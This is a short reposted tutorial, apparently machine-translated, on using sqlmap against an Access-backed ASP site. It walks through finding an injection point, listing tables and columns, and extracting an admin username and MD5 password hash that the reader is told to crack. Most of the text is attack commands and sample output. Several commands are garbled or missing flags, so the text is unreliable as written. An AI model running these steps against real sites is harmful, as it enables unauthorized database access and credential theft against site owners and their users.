Access injection of 1.SQLMAP learning notes

Source: Internet
Author: User
Tags md5 encryption

Using the Sqlmap tool for acces injection:
1. Determine if a URL has an injection point and determine the database type based on the returned data:

  " http://abcd****efg.asp?id=7 "  

Let's say the return content is as follows:

   -- -----------------------      [INFO] resuming back-end'Microsoft Access'    -------------------------

2. Guess the database table, enter:

" http://abcd****efg.asp?id=7 " --tables

3. Input thread: 10, enter after the start stopwatch, find the appropriate table, press CTRL + C to terminate stopwatch.

Suppose you find these tables: admin Mark Province vote

-- ----------------------------------------- [  4 tables] + -- --------------------+        admin       Mark       province       vote+----------------------+ 

4. Guess the fields of the admin table:

   " http://abcd****efg.asp?id=7 " --tables--columns-t Admin

Suppose you find the following fields for the admin table: ID Username Password

 -- ------------------------------- [ "   Retrieved:id  [ "   Retrieved:username  [ "   Retrieved:password  -- --------------------------------                  

5. Guess the contents of the field:

   " http://abcd****efg.asp?id=7 " " Username,password "

The obtained results are assumed to be:

+ -- -------------------------------+  Username  |    Admin+---------------------------------+  password  | 21232F297A57A5A743894A0E4A801FC3  (32-bit MD5 encryption) + -- -------------------------------+


Account: admin Password: Decrypt the cipher.

Access injection of 1.SQLMAP learning notes

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.